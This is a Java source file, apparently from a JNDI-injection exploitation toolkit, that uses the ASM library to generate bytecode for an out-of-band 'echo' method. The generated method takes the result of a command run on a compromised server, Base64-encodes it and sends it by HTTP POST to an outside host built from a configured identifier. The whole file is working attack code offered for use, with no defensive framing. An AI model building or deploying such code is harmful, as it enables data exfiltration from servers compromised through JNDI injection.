165
https://raw.githubusercontent.com/JosephTribbianni/JNDI/master/src/main/java/org/su18/asm/echo/OOBEcho.java
package org.su18.asm.echo;

import org.objectweb.asm.Label;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Opcodes;
import org.su18.utils.StringUtil;

public class OOBEcho implements Opcodes {


	public static void insert(String className, MethodVisitor mv) {
		Label label0 = new Label();
		mv.visitLabel(label0);
		mv.visitLdcInsn(StringUtil.getCurrentPropertiesValue("identifier"));
		mv.visitVarInsn(ASTORE, 1);
		Label label1 = new Label();
		mv.visitLabel(label1);
		mv.visitTypeInsn(NEW, "sun/misc/BASE64Encoder");
		mv.visitInsn(DUP);
		mv.visitMethodInsn(INVOKESPECIAL, "sun/misc/BASE64Encoder", "<init>", "()V", false);
		mv.visitVarInsn(ASTORE, 2);
		Label label2 = new Label();
		mv.visitLabel(label2);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitVarInsn(ALOAD, 0);
		mv.visitFieldInsn(GETFIELD, className, "result", "Ljava/lang/String;");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "getBytes", "()[B", false);
		mv.visitMethodInsn(INVOKEVIRTUAL, "sun/misc/BASE64Encoder", "encode", "([B)Ljava/lang/String;", false);
		mv.visitVarInsn(ASTORE, 3);
		Label label3 = new Label();
		mv.visitLabel(label3);
		mv.visitTypeInsn(NEW, "java/lang/StringBuilder");
		mv.visitInsn(DUP);
		mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "<init>", "()V", false);
		mv.visitLdcInsn("http://" + className + ".");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
		mv.visitVarInsn(ALOAD, 1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
		mv.visitVarInsn(ASTORE, 1);
		Label label4 = new Label();
		mv.visitLabel(label4);
		mv.visitTypeInsn(NEW, "java/net/URL");
		mv.visitInsn(DUP);
		mv.visitVarInsn(ALOAD, 1);
		mv.visitMethodInsn(INVOKESPECIAL, "java/net/URL", "<init>", "(Ljava/lang/String;)V", false);
		mv.visitVarInsn(ASTORE, 4);
		Label label5 = new Label();
		mv.visitLabel(label5);
		mv.visitTypeInsn(NEW, "java/lang/StringBuilder");
		mv.visitInsn(DUP);
		mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "<init>", "()V", false);
		mv.visitLdcInsn("{\"result\":\"");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
		mv.visitVarInsn(ALOAD, 3);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
		mv.visitLdcInsn("\"}");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
		mv.visitVarInsn(ASTORE, 5);
		Label label6 = new Label();
		mv.visitLabel(label6);
		mv.visitVarInsn(ALOAD, 4);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/URL", "openConnection", "()Ljava/net/URLConnection;", false);
		mv.visitTypeInsn(CHECKCAST, "java/net/HttpURLConnection");
		mv.visitVarInsn(ASTORE, 6);
		Label label7 = new Label();
		mv.visitLabel(label7);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitLdcInsn("Content-Type");
		mv.visitLdcInsn("application/json");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setRequestProperty", "(Ljava/lang/String;Ljava/lang/String;)V", false);
		Label label8 = new Label();
		mv.visitLabel(label8);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitInsn(ICONST_1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setDoOutput", "(Z)V", false);
		Label label9 = new Label();
		mv.visitLabel(label9);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitLdcInsn("Content-Length");
		mv.visitVarInsn(ALOAD, 5);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "length", "()I", false);
		mv.visitMethodInsn(INVOKESTATIC, "java/lang/String", "valueOf", "(I)Ljava/lang/String;", false);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setRequestProperty", "(Ljava/lang/String;Ljava/lang/String;)V", false);
		Label label10 = new Label();
		mv.visitLabel(label10);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitIntInsn(SIPUSH, 2000);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setConnectTimeout", "(I)V", false);
		Label label11 = new Label();
		mv.visitLabel(label11);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitIntInsn(SIPUSH, 5000);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setReadTimeout", "(I)V", false);
		Label label12 = new Label();
		mv.visitLabel(label12);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitInsn(ICONST_1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "setDoOutput", "(Z)V", false);
		Label label13 = new Label();
		mv.visitLabel(label13);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "getOutputStream", "()Ljava/io/OutputStream;", false);
		mv.visitVarInsn(ALOAD, 5);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "getBytes", "()[B", false);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/OutputStream", "write", "([B)V", false);
		Label label14 = new Label();
		mv.visitLabel(label14);
		mv.visitTypeInsn(NEW, "java/io/BufferedReader");
		mv.visitInsn(DUP);
		mv.visitTypeInsn(NEW, "java/io/InputStreamReader");
		mv.visitInsn(DUP);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "getInputStream", "()Ljava/io/InputStream;", false);
		mv.visitFieldInsn(GETSTATIC, "java/nio/charset/StandardCharsets", "UTF_8", "Ljava/nio/charset/Charset;");
		mv.visitMethodInsn(INVOKESPECIAL, "java/io/InputStreamReader", "<init>", "(Ljava/io/InputStream;Ljava/nio/charset/Charset;)V", false);
		mv.visitMethodInsn(INVOKESPECIAL, "java/io/BufferedReader", "<init>", "(Ljava/io/Reader;)V", false);
		mv.visitVarInsn(ASTORE, 7);
		Label label15 = new Label();
		mv.visitLabel(label15);
		mv.visitVarInsn(ALOAD, 7);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/Reader", "close", "()V", false);
		Label label16 = new Label();
		mv.visitLabel(label16);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/net/HttpURLConnection", "disconnect", "()V", false);
		Label label17 = new Label();
		mv.visitLabel(label17);
		mv.visitInsn(RETURN);
		Label label18 = new Label();
		mv.visitLabel(label18);
		mv.visitLocalVariable("this", "L" + className + ";", null, label0, label18, 0);
		mv.visitLocalVariable("target", "Ljava/lang/String;", null, label1, label18, 1);
		mv.visitLocalVariable("encoder", "Lsun/misc/BASE64Encoder;", null, label2, label18, 2);
		mv.visitLocalVariable("encodeResult", "Ljava/lang/String;", null, label3, label18, 3);
		mv.visitLocalVariable("url", "Ljava/net/URL;", null, label5, label18, 4);
		mv.visitLocalVariable("body", "Ljava/lang/String;", null, label6, label18, 5);
		mv.visitLocalVariable("connection", "Ljava/net/HttpURLConnection;", null, label7, label18, 6);
		mv.visitLocalVariable("in", "Ljava/io/Reader;", null, label15, label18, 7);

	}

}
